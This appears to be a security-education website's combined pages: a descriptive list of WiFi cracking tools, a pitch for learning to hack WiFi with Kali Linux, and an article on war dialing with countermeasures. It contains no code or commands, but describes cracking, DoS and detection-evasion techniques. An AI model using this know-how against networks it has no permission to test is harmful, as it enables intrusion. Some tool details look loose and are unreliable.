Security Professionals need to be intimately familiar with all a huge assortment of hacking software. There are literally THOUSANDS of hacking tools available for download. Some of these tools are free. Some of them must be purchased. Some of them are open source. Some of them are gold. Some of them are very poor.

And let’s not forget that a lot of hacking software you find may just be trojan horses in disguise. Think about it, if you’re a malicious hacker who wants to sucker a bunch of people into giving you access to their computers, what are you going to do?

You could code a “hacking tool” and offer it for download, meanwhile add in a hidden keylogger and maybe a bot client as well…

Be careful what you download. That does without saying. However, you can rest assured that the following list of hacking software is all legitimate and will NOT infect your computer with anything bad. These tools are used every day by thousands of IT security professionals and penetration testers, and you should get to know them if you want to get paid to do this stuff. Keep reading for my list of wifi hacking software. All of the hacking tools listed are included in one or more of my tutorials on this site.

WiFi Hacking Software

The alphabetical list of tools used in the tutorials on this website:

• Airbase
• Aircrack
• Aireplay
• Airmon
• Airodump
• Cowpatty
• Crunch
• Fern WiFi Cracker
• Gerix
• Hashcat
• John the ripper
• Macchanger
• Mdk3
• Pyrit
• Reaver
• Wireshark

Don’t be alarmed. These are a lot to take in, but I’ll break them down and explain what they do here. My other articles detail how to use these tools and what you ca do with them.

Hacking Software for Security Professionals

Airbase-ng

There are a ton of uses for airbase-ng, but one of the coolest things it can do is spoof WiFi networks. Attackers regularly use airbase-ng to create fake wireless access points to trick users into connecting to them. The attackers may offer enticing names like “Free WiFi.” Security professionals can also use airbase-ng to evaluate if company employees will connect to other access points and leak information. You should learn how this tool works.

Aircrack-ng

Aircrack-ng is the grand daddy of WiFi cracking tools. It can crack WEP, WPA, and WPA2 networks. It can crack WEP using statistical analysis of captured IVs, and it can crack WPA and WPA2 using dictionary files. It is available only through a Linux OS like BackTrack or Kali, often it is already installed.

Aireplay-ng

Aireplay is a traffic generation tool. It’s used to inject WiFi frames and is usually run in conjunction with airodump and aircrack. Why would you necessarily want to generate traffic and inject it into the wireless access point you’re targeting? By generating traffic and injecting it, aireplay can greatly increase the speed with which you can crack WEP.

Airmon-ng

Airmon is used to place your wireless adapter into monitor and packet injection mode. You need a wireless adapter capable of packet injection like the Alfa wireless adapter line. We use airmon-ng a LOT on this website.

Airodump-ng

Airodump sniffs and stores wifi traffic to a file. We use airodump quite a lot as well, especially in attacking WEP and WPA or WPA2 networks. Airodump stores the packets we will later need to run password cracking tools against.

Cowpatty

Cowpatty is a WPA and WPA2 hacking software. It can attack WPA / WPA2 networks using dictionary attacks and precomputed attacks using special rainbow tables.

Crunch

Crunch is a wordlist generator. You can specify a character limit, like 1 through 8 characters, and a character set, such as all upper- and lowercase English characters, plus numbers. Crunch will then generate a list of all possible combinations and permutations, of that character set. This can result in a sort of dictionary / bruteforce attack.

Fern WiFi Cracker

Fern is a GUI (Graphical User Interface) tool for cracking WEP and WPA networks. It allows attacking WPA using either a dictionary file or by the WPS vulnerability. If you can’t handle command line tools, you can use Fern because it offers a point-and-click interface and is very easy to figure out. (However, you’ll probably be made fun of if you can’t do your job using command line tools.)

Gerix

Gerix is another GUI WiFi hacking software. Again, use it if you have to, but you should really learn to use all the command line tools as well. Don’t cop out by just sticking to GUI hacking tools.

Hashcat

Hashcat is another flavor of WPA hacking software, and it claims to be the fastest WPA cracker available. I haven’t tested that, but hashcat is a great tool to have on your resume. Hashcat is a lot more powerful than most of the other tools we use. Because hashcat lets you combine a ton of different attack options like brute force, dictionary, combination, and hybrid brute force / dictionary attacks. You’ll learn all about this on my hashcat tutorial.

John the Ripper

John is a well known and used password cracking tool. We can also leverage the power of John the Ripper into attacking WPA and WPA2 preshared keys.

Macchanger

Macchanger isn’t hacking software, but it does allow us to spoof our wireless adapter’s MAC address to avoid detection, and it’s a tool and technique that malicious hackers use often. For that reason, you should be familiar with macchanger.

MDK3

MDK3, which stands for Murder, Death, Kill 3, is a denial of service tool for WiFi networks. If you can’t hack it, DoS it. MDK3 offers many options to flood an access point and prevent legitimate users from using it.

Pyrit

Pyrit allows you to precompute databases of possible WPA/WPA2 passwords. Pyrit is similar to hashcat.

Reaver

Reaver is a one of the best WiFi hacking tools available, because it allows you to hack WPA2 networks WITHOUT dictionary files, brute force attacks, or precomputed/rainbow tables. Reaver does not attack the WPA2 password directly like the other tools do. Reaver attempts to discover the password by attacking WPS Pins, which are 8 digit number strings to enable quick WiFi access. Not all WiFi networks have WPS, but those that do are at risk from a reaver attack.

Wireshark

Wireshark is a network sniffing tool. We can use wireshark to capture WPA handshakes for WPA/WPA2 cracking. We can also use wireshark once connecting to the wireless network in order to sniff client data.

---

So there you have it. A very quick breakdown of wireless hacking software. The tutorials and videos on this site use all of these hacking tools at least once, so you will gain a great understanding of how they work and be on your way to a successful IT security career.

Obviously you have found this page and hope to be able to do learn how to hack WiFi.

But, it is just as important to understand how to secure WiFi. This website is all about information. You’ll find everything you need here, from WEP WiFi hacks to more advanced WiFi password hacks. But pace yourself. Start here. You need a foundation before anything else.

Wireless network security is as important today as is locking your front door before bed every night. As I will show you below, using poor or no wireless security measures can actually get you into some serious trouble. I don’t mean a slap on the wrist from your Internet Service Provider, either. I’m talking about real, federal-prison-style trouble. You may think I’m lying. You may be wondering, how can having an insecure wireless network get me into trouble? So what if my WiFi security isn’t strong? It’s my access point and I can do whatever I want with it! For an real life example of just how dangerous insecure WiFi networks are, read about the guy who decided to hack his neighbor’s WiFi.

This is the wrong way to think about the problem. Everyone should make an effort to learn, expand on, and properly implement WiFi security in their own homes and businesses. Get your hands dirty. For security administrators and consultants, knowing how to hack WiFi is a basic requirement of the job. But everyone should know how to secure a wireless access point. And, I believe, everyone should also know how to hack WiFi. Why? The more we know, the better able we are to deal with the problem. Believe me, you don’t want to be under police suspicion because someone else did illegal activities on your network. It’s about liability.

Why should you know how to hack WiFi?

You must know your enemy, how he is likely to act, what hacking tools he is likely to use, and how he is likely to use them. You must learn all of this, and more, before you can beat him. If you do, you are in a much better position to prevent wireless attacks.

You are empowered.

If you still think that the idea of getting in legal trouble for insecure WiFi networks is absurd, consider that in many areas, having a swimming pool in your yard means you must also have some of fence enclosing the yard to others from getting into the pool and possibly drowning. Again, it all comes back to liability. (And yes, you can be liable for crimes committed from your networks!)

At the end of the day it’s all about awareness – a truth in all aspects of our lives.

As an information security consultant or wireless security auditor, you need to learn how to hack WiFi in the field as part of a particular engagement. Or, your boss may have tasked you on Friday afternoon to test the company’s Wireless Access Points against an outside intruder. Tools already exist which can automate much of this process, but knowing the nuts and bolts of how something is accomplished is very important, especially when troubleshooting problems, expanding on ideas, and deciding what the best method is in any given situation. So, why learn it all over again? Isn’t it reinventing the wheel?

The answer is, I believe, is no.

Wireless Security auditors, consultants, and administrators have a unique position in the InfoSec industry to be able to combat cyber-crimes such as this. These professionals are on the front lines of defense, and they must know how to hack WiFi and secure it in order to protect against stories like this. Hackers will not stop at a password-protected access point. They have plenty of tools and tricks to break into practically anything they’re put up against. WiFi hackers can just as easily crack a password using a dictionary attack, for instance, and then committed a crime on your network, i.e in your name. As the Internet and the real world continue to merge, network security (and particularly WiFi Security) becomes more vital.

So how would you hack WiFi? With this website you’re more than halfway there. All the lessons on this website are free, easy to follow, detailed articles and many with supporting videos. (I’d recommend looking at both to maximize your understanding of how to hack WiFi). There are some additional things you will need to own or buy. It won’t be expensive.

How to hack WiFi Step by Step

You’ll need two things:

1. Before you can understand how to hack WiFi, the very first thing you’ll want to do is to download Kali Linux, or a version of BackTrack from somewhere if you can find it as Kali Linux replaced BackTrack Linux since 2013, I still have lots of copies lying around on both live CDs and Live USB sticks and I refer to BackTrack in many of my tutorials as they were written a few years ago. However, the commands still work the same on either the latest Kali Linux, or an older version of BackTrack Linux.

What is Linux Kali & BackTack Linux?

You might have heard of Linux and know it is a computer oporating system, but not much else. Linux is indeed a computer oporating system, but is used on far fewer computers than Windows, probabably 95% of the home and office computers around the world run on Microsoft Windows (the most recent being Windows 10 & 11). However many servers (the computers which are the backbone of the internet) use a Linux based oporating system. Linux is generally less user friendly and requires more techincal knowledge, such as the use of command-line interface.

One of the main differences of Kali Linux or BackTrack Linux is that you run it from a live CD or live USB, essentially you can have an entire operating system loaded onto a CD or USB stick that you plug into ANY Desktop or Laptop computer without installing it. Noramally when you press the power button on your computer running Windows 10 or 11 it will load the Windows operating system, everything you do will be recorded and logged somewhere on the hard drive. When you fire up Kali Linux or BackTrack Link from a live CD or live USB nothing is saved, stored, logged, or recorded; it’s the perfect hacking tool!

Both are special penetration testing operating systems. Yes, an entire OS loaded with a dizzying array of hacking tools. Either Kali or Back Track will do. As Kali Linux is actually the successor to BackTrack, so you should be able to follow along with the video hacking tutorials and articles with either version. (I will be using a mix of Back Track and Kali for my video tutorials.)

2. You will also need a wireless adapter capable of packet injection. Packet injection involves intercepting and inserting TCP packets in such a way as to trick other, consenting nodes on the network (laptops, tablets, mobile phones, and wireless access points, for instance) into thinking the injected packets are legitimate. In reality, we want these injected packets to go unnoticed altogether.

One of the best wireless adapter cards that support packet injecting (and will work in Back Track and Kali) is the Alfa USB wireless network adapter. This thing rocks and can easily sniff WiFi networks out of the air from a range of several hundred meters. If you place it someplace outside within 100 meters, it is sure to pick up your target access point. So, in addition to Back Track or Kali, you will definitely need an Alfa card like the one below.

Once again, you WILL need one of these adapters to follow my how to hack WiFi lessons. If your existing wireless adapter can’t enter packet injection mode, none of what I teach here will work.

With that said, I invite you to look around here. You’ll find a huge assortment of hacking tutorials and articles. Think of these as your Entry Level 101 classes. From here, you’ll understand how to hack WiFi using a variety of methods and technologies. If you’re new to all of this, I’d definitely recommend checking out all the general stuff first before diving into the harder stuff. And yes, there are plenty of more advanced methods to hack WiFi. Wireless security consultants and security administrators (and anyone who does know a thing or two about WiFi hacks) can skip ahead to the more advanced tricks. No matter what kind of wireless security you’re up against, you’ve stumbled on the mother lode.  

This will teach you how to hack WiFi. Dive in.

For anyone who hasn’t seen the movie WarGames, you may not know what war dialing is. Some of you might know about war dialing, but wrongly assume that it’s an outdated hacking method that doesn’t even work nowadays. Either way, I encourage you to check out this information-packed article on war dialing and how it can affect network and computer security even today. The truth is, war dialing is still a threat. The nature of the threat has just changed a little.

Aspiring IT security experts should be well-versed in war dialing. It’s an old technique, some may even say ancient. But it still happens today, and with the rise in Voice over IP telephone systems (VOIP systems), war dialing may even be making a big comeback.

In the late ’80s and throughout most of the ’90s, war dialing was a constant threat to IT systems worldwide. The Internet was still in its infancy, and computer security concepts were even younger. War dialers of the day would exploit company telephone and private branch exchange (PBX) systems, breaking inside the organization to steal data or map the internal networks. These early attacks and the attackers themselves utilized war dialing tools such as THC Scan.

THC Scan was an old-school DOS program, that allowed attackers a fair degree of automation. With this tool, attackers could automatically dial telephone numbers from a predetermined range or from a list of specific telephone numbers. THC Scan was also able to detect voice message systems or answering machines. Often, attackers would pair THC Scan with another tool, THC Login Hacker. Both tools in tandem allowed an attacker to war dial a set of telephone numbers and then try to brute force or password guess the modem, voice mail, and PBX passwords that had been set. Often, these passwords were extremely short and easy to guess. Many times the passwords had not been changed from their default manufacturer set values.

As time went on, and the field of computer security began to mature, the rate of war dialing attacks began to drop. It’s now considered a legacy method of hacking, and is pretty rare to see security professionals discuss it. Mostly, war dialing has been forgotten. But it shouldn’t be, because it’s still a very dangerous method of attacking computer systems. Why?

Because, even after almost 30 years, war dialing is still pretty effective. And with more people now working from home and connecting to the internet for work, this type of attack, well, still works.

Remember, a war dialing program can be set to systematically dial thousands of telephone numbers. These programs will dial again and again, searching for modems or other telephony systems that answer.

New War Dialing Tools

With the rise in Voice Over IP (VOIP) telephone systems, war dialing has made a come back. There are a host of new tools attackers are using to continue their assault against computer networks. Security professionals need to be aware of these new war dialing methods. Penetration tests (both black, white, and grey box) should include war dialing as a part of the security audit or vulnerability assessment. If your network has any sort of security hole or vulnerability through a networked telephone system, you want to find out about it before the bad guys do.

Remember, war dialing isn’t just about hacking modems anymore (even though that’s still a part of it). Nowadays, war dialing is about hacking VOIP systems. VOIP systems are just telephone systems that are hooked up to the Internet and not a dedicated phone line. That means, the computers, servers, and wireless access points will often share the same ethernet cables that the telephones do.

Windows War Dialing Tools

Telesweep is a free modem vulnerability scanner that you can grab from the SecureLogix website. Telesweep is like an updated version of THC Scan, but with more features and updated methods of attacking VOIP systems.

SecureLogix offers TeleSweep as a free download. Security professionals can configure it to to dial corporate telephone numbers and report the number of modems connected to these lines. Modem connections are often weakly configured, or left at their default settings. These modem connections are often a forgotten (and dangerous) backdoor to the inside of your LAN. Malicious hackers and other outside intruders may use tools such as Telesweep to gain unauthorized access into your network.

VOIP War Dialing

VOIP telephone systems are all the vogue now. However, the newest technologies often aren’t the most secure. Security can lag new technology. VOIP allows telephones and computers may share the same physical network cables, switches, and firewalls. It is a breakthrough in cost-savings and ease of use. Now, companies don’t need dedicated phone lines. They can simply route all the voice and data through the same hardware. However, because of this, hackers are reviving war dialing and are developing new tools to war dial more effectively than ever.

Warvox War Dialing Software

WarVOX is a war dialing program for Windows. It is a suite of tools for exploring, classifying, and auditing telephone systems. Unlike normal war dialing tools, WarVOX does not use a modem directly, and can instead be run directly from Windows. Because of this, WarVOX can discover a large range of interesting voice lines, including modems, faxe machines, voice mail boxes, PBXs, and VOIP systems.

War Dialing Prevention

It’s not enough to just know of war dialing. IT security professionals need to know how to safeguard and protect against war dialing attacks. Luckily, there are a lot of war dialing countermeasures you can implement to prevent against this sort of attack.

Let’s start with the basic prevention methods:

1. Change all default passwords for any VOIP, PBX, voice mail, backup modem, or fax machines you may have connected to your network. This step is crucial, and it should be the first one that you take when securing VOIP and other telephone systems. Most modems and VOIP systems have default passwords already set. Make sure you change them, and make sure they are long and difficult to guess. Ask yourself, would my password appear in a hacker’s dictionary file? Would it be simple enough to guess or brute force? If so, change the password to something more difficult.

2. Check for updates and apply security patches as soon as possible. Make a list of all your VOIP, modem, fax, and other telephony hardware. Check the manufacture websites for updates, and you’re on your way to a more secure network.

3. Conduct a manual reconnaissance of your network. You should regularly scan your own network for modems and telephone systems. Perform war dialing against your own external telephone numbers, anything that could potentially dial into your own network. Be proactive! Make a baseline of every device you find and keep track of it. Often times, employees will bring in their own modems and connect them to the company network so they can bypass web filtering. Watch for this!

4. Log all successful and failed login attempts. Modern modems and VOIP systems should allow you to monitor logins. Make sure you enable this feature and store the logs on a central log management system with something like Kiwi or Splunk.

5. Use VLANs to segment voice and data. You’ll need to be using web managed switches and fairly new firewalls to implement this feature, but it’s by far one of the most secure and comprehensive ways to prevent war dialing attacks from infiltrating your network. Using VLANs, you can logically separate your voice communications from your data communications, while still allowing both to run on the same network cables and hardware. With proper VLANing, even if an attacker war dials into your phone systems, the attacker won’t be able to see your data nodes (such as servers and desktops.)

6. Lastly, you can take a look at the Sand Trap tool. Sand Trap can be configured to monitor for any war dial attempts and even answer those dials. Sand Trap can log the caller ID and provide a login banner and password prompt for the dialer. This is an awesome tool that can act as a barrier between a war dialer and a telephone or modem system. However, it won’t work with every telephone device out there, so check it out before committing to it.